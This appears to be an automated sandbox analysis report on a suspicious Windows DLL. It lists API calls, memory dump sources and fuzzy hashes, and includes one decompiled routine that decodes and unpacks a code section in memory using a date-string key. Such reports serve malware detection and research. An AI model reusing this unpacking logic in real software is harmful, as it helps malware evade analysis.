                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 6E1F1B43
                                                                                                                                                                                                                                                                      • Part of subcall function 6E1F18D1: memset.NTDLL ref: 6E1F1950
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.605070540.000000006E1F1000.00000020.00020000.sdmp, Offset: 6E1F0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.605056165.000000006E1F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.605084485.000000006E1F3000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.605091636.000000006E1F5000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.605100957.000000006E1F6000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: AddressProc$AllocHandleHeapModulememset
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 426539879-0
                                                                                                                                                                                                                                                                    • Opcode ID: 6be537a930ba9c7d4cb1123006079951051b1450ff32bab565c90c249bc49e40
                                                                                                                                                                                                                                                                    • Instruction ID: 17c9a7a92796a0a6d12c75994c727340f11170336c9adad4fc49af5d5dc17201
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6be537a930ba9c7d4cb1123006079951051b1450ff32bab565c90c249bc49e40
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CB2171F160060ADFDB40EFA9D990E5B7BFCFB55284B118426E845D7212E730ED46ABE0
                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,6E238DA8,6E23700A,6E237312), ref: 6E2391A7
                                                                                                                                                                                                                                                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6E2391B5
                                                                                                                                                                                                                                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6E2391CE
                                                                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000,?,6E238DA8,6E23700A,6E237312), ref: 6E239220
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.605127247.000000006E1FE000.00000020.00020000.sdmp, Offset: 6E1FE000, based on PE: false
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 3852720340-0
                                                                                                                                                                                                                                                                    • Opcode ID: 60ae02611749972d842b700a6a022a784de06b2222b6f7eb8186a65568a7fc9e
                                                                                                                                                                                                                                                                    • Instruction ID: 930277948b7e7d787cff071e99c6885fe24a7b571aceae47d41331a3c5d5c687
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 60ae02611749972d842b700a6a022a784de06b2222b6f7eb8186a65568a7fc9e
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 310122F2219A3F9FEF1411F5AC8CA96375BEB03779730022AE520910C9EF924825DD24
                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.605127247.000000006E1FE000.00000020.00020000.sdmp, Offset: 6E1FE000, based on PE: false
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: AdjustPointer
                                                                                                                                                                                                                                                                    • String ID: y#n
                                                                                                                                                                                                                                                                    • API String ID: 1740715915-1692166551
                                                                                                                                                                                                                                                                    • Opcode ID: c98c0a8c22912f7a8176bdbd3770440f331ecb41c43c7e77dc0dadf1a08ae1b6
                                                                                                                                                                                                                                                                    • Instruction ID: 36f33edce26857166440eb809913867e5f9506fd293a054d9989b9538df4a162
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c98c0a8c22912f7a8176bdbd3770440f331ecb41c43c7e77dc0dadf1a08ae1b6
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D451A0F650462F9FDB148FD9C850BAAB7BAAF02715F204529E8154A2D8DF31E860CF90
                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    • C:\Windows\SYSTEM32\loaddll32.exe, xrefs: 6E24120C
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.605127247.000000006E1FE000.00000020.00020000.sdmp, Offset: 6E1FE000, based on PE: false
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID: C:\Windows\SYSTEM32\loaddll32.exe
                                                                                                                                                                                                                                                                    • API String ID: 0-1872383224
                                                                                                                                                                                                                                                                    • Opcode ID: 6550e506ada450b4f32768c1e5ee30bf7dfdfe672b1a57dd6a9019d2a9035819
                                                                                                                                                                                                                                                                    • Instruction ID: f25f4eab8f2f5374e3eda02fb91543d6349478fe7a208cedafa672b80af60d9c
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6550e506ada450b4f32768c1e5ee30bf7dfdfe672b1a57dd6a9019d2a9035819
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6C218E7161422EEF9B58DFE5DC80D9B77AFAF053697104A14F928D7150E730ECA88BA0
                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 6E2457C7
                                                                                                                                                                                                                                                                      • Part of subcall function 6E23D68A: HeapFree.KERNEL32(00000000,00000000,?,6E245842,?,00000000,?,6E270096,?,6E245869,?,00000007,?,?,6E242AD1,?), ref: 6E23D6A0
                                                                                                                                                                                                                                                                      • Part of subcall function 6E23D68A: GetLastError.KERNEL32(?,?,6E245842,?,00000000,?,6E270096,?,6E245869,?,00000007,?,?,6E242AD1,?,?), ref: 6E23D6B2
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 6E2457D9
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 6E2457EB
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 6E2457FD
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 6E24580F
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.605127247.000000006E1FE000.00000020.00020000.sdmp, Offset: 6E1FE000, based on PE: false
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 776569668-0
                                                                                                                                                                                                                                                                    • Opcode ID: b6cfef0e0eea268b052397803a2f4b4ea3abc4b3350a38ab18bafc1ef3de69ad
                                                                                                                                                                                                                                                                    • Instruction ID: 7d08c920d93dffcf1ec1fdc7d3acf7916c15eb3a41dfdec6daa18bebbd77aea9
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b6cfef0e0eea268b052397803a2f4b4ea3abc4b3350a38ab18bafc1ef3de69ad
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2FF0377148062EDB8B94DA98F8C8C4A33EFBB007127714809E4ACD7500DB31F8808EA4
                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.605127247.000000006E1FE000.00000020.00020000.sdmp, Offset: 6E1FE000, based on PE: false
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: _free
                                                                                                                                                                                                                                                                    • String ID: *?
                                                                                                                                                                                                                                                                    • API String ID: 269201875-2564092906
                                                                                                                                                                                                                                                                    • Opcode ID: be0b59ba3c73918a4b6b6aaecc14d9a85920bed4f98c2dc0d16ea2f4ec30d012
                                                                                                                                                                                                                                                                    • Instruction ID: edf36dcc8f8690f171f25a929bab9b3563e75a4eaf6223be9e423c542be32cbd
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: be0b59ba3c73918a4b6b6aaecc14d9a85920bed4f98c2dc0d16ea2f4ec30d012
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 37614CB5D0021EDFCB18CFA8C8809DDBBF6EF58314B248569D815E7304E775AA818F90
                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 6E238E5F
                                                                                                                                                                                                                                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 6E238F13
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.605127247.000000006E1FE000.00000020.00020000.sdmp, Offset: 6E1FE000, based on PE: false
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                                                    • String ID: csm$y#n
                                                                                                                                                                                                                                                                    • API String ID: 3480331319-2264020820
                                                                                                                                                                                                                                                                    • Opcode ID: 53c551ef0f91e53f92d586c355918dea2692a6dd600710c15c5a8fba4c3db24d
                                                                                                                                                                                                                                                                    • Instruction ID: 0c78d4a9b987671d6dea87edb5512f9bf97fdd85dcde71b351a3198715b3d5a9
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 53c551ef0f91e53f92d586c355918dea2692a6dd600710c15c5a8fba4c3db24d
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AF41E5B491022E9BCF44CFA8C844A9EBBB7BF45318F208556E9189F381D7329A01CF90
                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • RtlEncodePointer.NTDLL(00000000), ref: 6E2398AB
                                                                                                                                                                                                                                                                    • CatchIt.LIBVCRUNTIME ref: 6E239991
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.605127247.000000006E1FE000.00000020.00020000.sdmp, Offset: 6E1FE000, based on PE: false
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: CatchEncodePointer
                                                                                                                                                                                                                                                                    • String ID: MOC$RCC
                                                                                                                                                                                                                                                                    • API String ID: 1435073870-2084237596
                                                                                                                                                                                                                                                                    • Opcode ID: a44f195f029b380c9684bd775e41b6d07bd2dfeb0883ed15374457165f229a0e
                                                                                                                                                                                                                                                                    • Instruction ID: cd0c1d6e432eb3fc75652b6c5156116ba26da7a9ad62c8d82514666e3ede15e6
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a44f195f029b380c9684bd775e41b6d07bd2dfeb0883ed15374457165f229a0e
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 514159B190021EAFCF02CFD4CC80AEE7BB6BF49305F244059E91967259DB35A960DF50
                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • GetModuleHandleExW.KERNEL32(00000000,6E26947C,00000000,?,?,6E23C2C2,?,?,6E23C28A,?,?,?), ref: 6E23C325
                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,6E269494), ref: 6E23C338
                                                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,6E23C2C2,?,?,6E23C28A,?,?,?), ref: 6E23C35B
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.605127247.000000006E1FE000.00000020.00020000.sdmp, Offset: 6E1FE000, based on PE: false
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                                    • String ID: y#n
                                                                                                                                                                                                                                                                    • API String ID: 4061214504-1692166551
                                                                                                                                                                                                                                                                    • Opcode ID: fa1209aeff62d775ae76282ee327f6e109fea5a59c4830fcbc2cc39d42f3c454
                                                                                                                                                                                                                                                                    • Instruction ID: 7a687c9d759b45a116d3db7e8a1899168a40b42ce57c36f168b3c302217ccc25
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fa1209aeff62d775ae76282ee327f6e109fea5a59c4830fcbc2cc39d42f3c454
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BBF0827150052FFBDF01AB91C94DBDDBB76EB00756F140060E905A5150CB728E50DEA0
                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 6E246DAD
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 6E246DD6
                                                                                                                                                                                                                                                                    • SetEndOfFile.KERNEL32(00000000,6E244603,00000000,6E23FCD2,?,?,?,?,?,?,?,6E244603,6E23FCD2,00000000), ref: 6E246E08
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,6E244603,6E23FCD2,00000000,?,?,?,?,00000000,?), ref: 6E246E24
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.605127247.000000006E1FE000.00000020.00020000.sdmp, Offset: 6E1FE000, based on PE: false
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: _free$ErrorFileLast
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 1547350101-0
                                                                                                                                                                                                                                                                    • Opcode ID: 4cf6a4ee52532d02ec7873fc54d2fe10dd95c413885a2e307526fdd450338089
                                                                                                                                                                                                                                                                    • Instruction ID: c735588c6742cc2f8f27a00a8e403b67b311d0d6bd923d6dffa6f3614900a652
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4cf6a4ee52532d02ec7873fc54d2fe10dd95c413885a2e307526fdd450338089
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BF41C2BA920A0EDBDB096FF8CC80FCD37BBAF45365F240914E424A7194EB71C8448E21
                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                    C-Code - Quality: 87%
                                                                                                                                                                                                                                                                    			E6E1F15A3(void* __edi, intOrPtr _a4) {
                                                                                                                                                                                                                                                                    				intOrPtr _v8;
                                                                                                                                                                                                                                                                    				unsigned int _v12;
                                                                                                                                                                                                                                                                    				intOrPtr _v16;
                                                                                                                                                                                                                                                                    				char _v20;
                                                                                                                                                                                                                                                                    				void* _v24;
                                                                                                                                                                                                                                                                    				intOrPtr _v28;
                                                                                                                                                                                                                                                                    				intOrPtr _v32;
                                                                                                                                                                                                                                                                    				void* _v36;
                                                                                                                                                                                                                                                                    				signed int _v44;
                                                                                                                                                                                                                                                                    				signed int _v48;
                                                                                                                                                                                                                                                                    				intOrPtr _t39;
                                                                                                                                                                                                                                                                    				void* _t46;
                                                                                                                                                                                                                                                                    				intOrPtr _t47;
                                                                                                                                                                                                                                                                    				intOrPtr _t50;
                                                                                                                                                                                                                                                                    				signed int _t59;
                                                                                                                                                                                                                                                                    				signed int _t61;
                                                                                                                                                                                                                                                                    				intOrPtr _t66;
                                                                                                                                                                                                                                                                    				intOrPtr _t77;
                                                                                                                                                                                                                                                                    				void* _t78;
                                                                                                                                                                                                                                                                    				signed int _t80;
                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                    				_t77 =  *0x6e1f41b0;
                                                                                                                                                                                                                                                                    				_t39 = E6E1F1A4B(_t77,  &_v20,  &_v12);
                                                                                                                                                                                                                                                                    				_v16 = _t39;
                                                                                                                                                                                                                                                                    				if(_t39 == 0) {
                                                                                                                                                                                                                                                                    					asm("sbb ebx, ebx");
                                                                                                                                                                                                                                                                    					_t59 =  ~( ~(_v12 & 0x00000fff)) + (_v12 >> 0xc);
                                                                                                                                                                                                                                                                    					_t78 = _t77 + _v20;
                                                                                                                                                                                                                                                                    					_v36 = _t78;
                                                                                                                                                                                                                                                                    					_t46 = VirtualAlloc(0, _t59 << 0xc, 0x3000, 4);
                                                                                                                                                                                                                                                                    					_v24 = _t46;
                                                                                                                                                                                                                                                                    					if(_t46 == 0) {
                                                                                                                                                                                                                                                                    						_v16 = 8;
                                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                                    						_t61 = 0;
                                                                                                                                                                                                                                                                    						if(_t59 <= 0) {
                                                                                                                                                                                                                                                                    							_t47 =  *0x6e1f41cc;
                                                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                                                    							_t66 = _a4;
                                                                                                                                                                                                                                                                    							_t50 = _t46 - _t78;
                                                                                                                                                                                                                                                                    							_t11 = _t66 + 0x6e1f5137; // 0x6e1f5137
                                                                                                                                                                                                                                                                    							_v28 = _t50;
                                                                                                                                                                                                                                                                    							_v32 = _t50 + _t11;
                                                                                                                                                                                                                                                                    							_v8 = _t78;
                                                                                                                                                                                                                                                                    							while(1) {
                                                                                                                                                                                                                                                                    								asm("movsd");
                                                                                                                                                                                                                                                                    								asm("movsd");
                                                                                                                                                                                                                                                                    								asm("movsd");
                                                                                                                                                                                                                                                                    								_t19 = _t61 + 1; // 0x2
                                                                                                                                                                                                                                                                    								_t80 = _t19;
                                                                                                                                                                                                                                                                    								E6E1F1D02(_v8 + _t50, _v8, (_v48 ^ _v44) + _v20 + _a4 >> _t80);
                                                                                                                                                                                                                                                                    								_t64 = _v32;
                                                                                                                                                                                                                                                                    								_v8 = _v8 + 0x1000;
                                                                                                                                                                                                                                                                    								_t47 =  *((intOrPtr*)(_v32 + 0xc)) -  *((intOrPtr*)(_t64 + 8)) +  *((intOrPtr*)(_t64 + 4));
                                                                                                                                                                                                                                                                    								_t61 = _t80;
                                                                                                                                                                                                                                                                    								 *0x6e1f41cc = _t47;
                                                                                                                                                                                                                                                                    								if(_t61 >= _t59) {
                                                                                                                                                                                                                                                                    									break;
                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                    								_t50 = _v28;
                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                    						if(_t47 != 0x63699bc3) {
                                                                                                                                                                                                                                                                    							_v16 = 0xc;
                                                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                                                    							memcpy(_v36, _v24, _v12);
                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                    						VirtualFree(_v24, 0, 0x8000);
                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                    				return _v16;
                                                                                                                                                                                                                                                                    			}























                                                                                                                                                                                                                                                                    0x6e1f15aa
                                                                                                                                                                                                                                                                    0x6e1f15ba
                                                                                                                                                                                                                                                                    0x6e1f15c1
                                                                                                                                                                                                                                                                    0x6e1f15c4
                                                                                                                                                                                                                                                                    0x6e1f15d9
                                                                                                                                                                                                                                                                    0x6e1f15e0
                                                                                                                                                                                                                                                                    0x6e1f15e5
                                                                                                                                                                                                                                                                    0x6e1f15f6
                                                                                                                                                                                                                                                                    0x6e1f15f9
                                                                                                                                                                                                                                                                    0x6e1f1601
                                                                                                                                                                                                                                                                    0x6e1f1604
                                                                                                                                                                                                                                                                    0x6e1f16ae
                                                                                                                                                                                                                                                                    0x6e1f160a
                                                                                                                                                                                                                                                                    0x6e1f160a
                                                                                                                                                                                                                                                                    0x6e1f160e
                                                                                                                                                                                                                                                                    0x6e1f1676
                                                                                                                                                                                                                                                                    0x6e1f1610
                                                                                                                                                                                                                                                                    0x6e1f1610
                                                                                                                                                                                                                                                                    0x6e1f1613
                                                                                                                                                                                                                                                                    0x6e1f1615
                                                                                                                                                                                                                                                                    0x6e1f161d
                                                                                                                                                                                                                                                                    0x6e1f1620
                                                                                                                                                                                                                                                                    0x6e1f1623
                                                                                                                                                                                                                                                                    0x6e1f162b
                                                                                                                                                                                                                                                                    0x6e1f1633
                                                                                                                                                                                                                                                                    0x6e1f1634
                                                                                                                                                                                                                                                                    0x6e1f1635
                                                                                                                                                                                                                                                                    0x6e1f163c
                                                                                                                                                                                                                                                                    0x6e1f163c
                                                                                                                                                                                                                                                                    0x6e1f1650
                                                                                                                                                                                                                                                                    0x6e1f1655
                                                                                                                                                                                                                                                                    0x6e1f165e
                                                                                                                                                                                                                                                                    0x6e1f1665
                                                                                                                                                                                                                                                                    0x6e1f1668
                                                                                                                                                                                                                                                                    0x6e1f166c
                                                                                                                                                                                                                                                                    0x6e1f1671
                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                    0x6e1f1628
                                                                                                                                                                                                                                                                    0x6e1f1628
                                                                                                                                                                                                                                                                    0x6e1f1673
                                                                                                                                                                                                                                                                    0x6e1f1680
                                                                                                                                                                                                                                                                    0x6e1f1695
                                                                                                                                                                                                                                                                    0x6e1f1682
                                                                                                                                                                                                                                                                    0x6e1f168b
                                                                                                                                                                                                                                                                    0x6e1f1690
                                                                                                                                                                                                                                                                    0x6e1f16a6
                                                                                                                                                                                                                                                                    0x6e1f16a6
                                                                                                                                                                                                                                                                    0x6e1f16b5
                                                                                                                                                                                                                                                                    0x6e1f16bb

                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004,?,?,00000000,00000000), ref: 6E1F15F9
                                                                                                                                                                                                                                                                    • memcpy.NTDLL(?,?,00000000,?,?,00000000,00000000,?,?,?,?,?,?,?,?,6E1F17EC), ref: 6E1F168B
                                                                                                                                                                                                                                                                    • VirtualFree.KERNEL32(?,00000000,00008000,?,?,00000000,00000000), ref: 6E1F16A6
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.605070540.000000006E1F1000.00000020.00020000.sdmp, Offset: 6E1F0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.605056165.000000006E1F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.605084485.000000006E1F3000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.605091636.000000006E1F5000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.605100957.000000006E1F6000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Virtual$AllocFreememcpy
                                                                                                                                                                                                                                                                    • String ID: Mar 26 2021
                                                                                                                                                                                                                                                                    • API String ID: 4010158826-2175073649
                                                                                                                                                                                                                                                                    • Opcode ID: 569e4d848761ca8dfcabd28b608a9150eaab1c6382a2d370cdd6dd616d9b96f0
                                                                                                                                                                                                                                                                    • Instruction ID: f463ba425cfb60c688d33088a2ca82216d85ec63d7aeeebcd2d6bc4c744765c4
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 569e4d848761ca8dfcabd28b608a9150eaab1c6382a2d370cdd6dd616d9b96f0
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 99315EB1E00609EFDF00CF99D880ADEBBF9BF49314F148129E515A7246D771AA4A9FD0
                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                      • Part of subcall function 6E2410C1: _free.LIBCMT ref: 6E2410CF
                                                                                                                                                                                                                                                                      • Part of subcall function 6E241C1A: WideCharToMultiByte.KERNEL32(?,00000000,6E23F667,00000000,00000001,6E23F5F6,6E243EDB,?,6E23F667,?,00000000,?,6E243C4A,0000FDE9,00000000,?), ref: 6E241CBC
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 6E240B07
                                                                                                                                                                                                                                                                    • __dosmaperr.LIBCMT ref: 6E240B0E
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 6E240B4D
                                                                                                                                                                                                                                                                    • __dosmaperr.LIBCMT ref: 6E240B54
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.605127247.000000006E1FE000.00000020.00020000.sdmp, Offset: 6E1FE000, based on PE: false
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 167067550-0
                                                                                                                                                                                                                                                                    • Opcode ID: 0e8f8ff1ad683a03588f043c0a7ee94e31e75e5ee58ba20ae700419b0ab8e5d3
                                                                                                                                                                                                                                                                    • Instruction ID: 1df7ba487e0dbb17035138ddd7d6e0fc38cdfd839efbd40d635a7ee08f2b41af
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0e8f8ff1ad683a03588f043c0a7ee94e31e75e5ee58ba20ae700419b0ab8e5d3
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D621C47160421EEF9B199FE6CC90C9B77BFEF113687104914E92987140E731EC908FA6
                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.605127247.000000006E1FE000.00000020.00020000.sdmp, Offset: 6E1FE000, based on PE: false
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: 1478d614d4fe1469bb8aee1714bd6194960fb516bda7eaddc93b7203bb598ae9
                                                                                                                                                                                                                                                                    • Instruction ID: ee0efca33cca45524b456867e12551e4ec800044271664178559e85a45e6f741
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1478d614d4fe1469bb8aee1714bd6194960fb516bda7eaddc93b7203bb598ae9
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2B212779F0162BEBCB169AE9CC84B5B376B9B03B61F110510ED15A7280E770ED68C9F0
                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,6E243991,?,00000001,6E23F667,?,6E243E50,00000001,?,?,?,6E23F5F6,?,?), ref: 6E23D3B1
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 6E23D40E
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 6E23D444
                                                                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000,6E2700D0,000000FF,?,6E243E50,00000001,?,?,?,6E23F5F6,?,?,?,6E26EBD8,0000002C,6E23F667), ref: 6E23D44F
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.605127247.000000006E1FE000.00000020.00020000.sdmp, Offset: 6E1FE000, based on PE: false
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ErrorLast_free
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 2283115069-0
                                                                                                                                                                                                                                                                    • Opcode ID: 5624dc61bfc156235aaabe2c852a64ec71db10d3117b141724cb2a7a7bf4a7ad
                                                                                                                                                                                                                                                                    • Instruction ID: b6521156d952190c61ba2f454fa89e596b8427a820dcfb5bb5a10a338ec00fe7
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5624dc61bfc156235aaabe2c852a64ec71db10d3117b141724cb2a7a7bf4a7ad
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2411EBB620462EABDB5516F6DC84F5A235FA7C2679F350524F624D71C0EFA29C04CD31
                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(00000001,00000001,6E270096,6E23D67C,6E23D707,6E270094,?,6E237E19,6E270096,6E270094,?,?,?,6E234DCE,00000001,6E270098), ref: 6E23D508
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 6E23D565
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 6E23D59B
